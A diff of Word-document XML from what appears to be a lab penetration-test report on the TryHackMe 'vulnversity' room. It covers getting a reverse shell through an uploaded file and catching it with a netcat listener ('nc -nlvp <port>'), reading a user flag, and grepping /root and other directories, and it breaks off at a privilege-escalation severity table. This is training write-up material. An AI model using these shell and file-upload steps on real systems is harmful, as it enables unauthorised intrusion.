                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3049,7 +5566,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="738505"/>
+                      <a:ext cx="5943600" cy="3343275"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -3064,39 +5581,2024 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="294E9C39" wp14:editId="3CA41A2C">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>1943100</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>408305</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1295400" cy="295275"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="164288916" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1295400" cy="295275"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>nc</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> -</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t>nlvp</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:rPr>
+                                <w:szCs w:val="24"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> &lt;port&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="294E9C39" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:153pt;margin-top:32.15pt;width:102pt;height:23.25pt;z-index:251669504;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>nc</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> -</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t>nlvp</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:rPr>
+                          <w:szCs w:val="24"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> &lt;port&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>before</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> opening the file listen on the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>port</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you specified in your reverse shell using</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">command </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="360"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>open the file you uploaded from the web application you will find it on endpoint /internal/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>uplouds</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> connection </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>stabilished</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> now </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>run</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> your commands </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we identified directory named </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>home</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> so we moved to it and found bill directory </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>we</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> guessed </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the username we </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>found the flag</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in user.txt file in bill directory</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="20"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F4B5D0B" wp14:editId="23DA7EBD">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:posOffset>390525</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>323850</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="5286375" cy="247650"/>
+                <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
+                <wp:wrapSquare wrapText="bothSides"/>
+                <wp:docPr id="414156679" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="5286375" cy="247650"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:srgbClr val="FFFFFF"/>
+                        </a:solidFill>
+                        <a:ln w="9525">
+                          <a:solidFill>
+                            <a:srgbClr val="000000"/>
+                          </a:solidFill>
+                          <a:miter lim="800000"/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:hyperlink r:id="rId31" w:history="1">
+                              <w:r>
+                                <w:rPr>
+                                  <w:rStyle w:val="Hyperlink"/>
+                                </w:rPr>
+                                <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/comp-webserver/compromising-2025-11-26_04.39.57.mp4</w:t>
+                              </w:r>
+                            </w:hyperlink>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="2F4B5D0B" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:30.75pt;margin-top:25.5pt;width:416.25pt;height:19.5pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:hyperlink r:id="rId32" w:history="1">
+                        <w:r>
+                          <w:rPr>
+                            <w:rStyle w:val="Hyperlink"/>
+                          </w:rPr>
+                          <w:t>https://github.com/ahmeedkhattabj/omerta-final-project/blob/main/comp-webserver/compromising-2025-11-26_04.39.57.mp4</w:t>
+                        </w:r>
+                      </w:hyperlink>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="square" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>poc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> video getting the flag </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>on :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:spacing w:before="0" w:after="0" w:afterAutospacing="0"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:szCs w:val="24"/>
-          <w:lang w:bidi="ar-EG"/>
-        </w:rPr>
-        <w:t>7- we can search for the flag by listing all directories and grep text by this 'ls -la /root /home /var/www /tmp /opt /usr/local 2&gt;/dev/null | grep -i "flag"'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+          <w:noProof/>
+          <w:color w:val="C00000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="22" w:name="_Toc215079554"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:color w:val="C00000"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>privilege escalation to get root/admin access</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="22"/>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="PlainTable1"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2875"/>
+        <w:gridCol w:w="6475"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="467"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Severity </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+              <w:rPr>
+                <w:color w:val="C00000"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="FFFFFF" w:themeColor="background1"/>
+              </w:rPr>
+              <w:t>Critical</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="431"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
+              <w:t>CVSS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId33" w:anchor="CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>CVSS 9.9</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="440"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Affected Assets</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:hyperlink r:id="rId34" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://tryhackme.com/room/vulnversity</w:t>
+              </w:r>
+            </w:hyperlink>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+          <w:trHeight w:val="422"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            <w:tcW w:w="2875" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:rPr>
+                <w:rtl/>
+                <w:lang w:bidi="ar-EG"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:bidi="ar-EG"/>
+              </w:rPr>
+              <w:t>Reference</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6475" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="both"/>
+              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
+            </w:pPr>
+            <w:hyperlink r:id="rId35" w:history="1">
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="Hyperlink"/>
+                </w:rPr>
+                <w:t>https://www.vaadata.com/blog/linux-privilege-escalation-techniques-and-security-tips/</w:t>
+              </w:r>
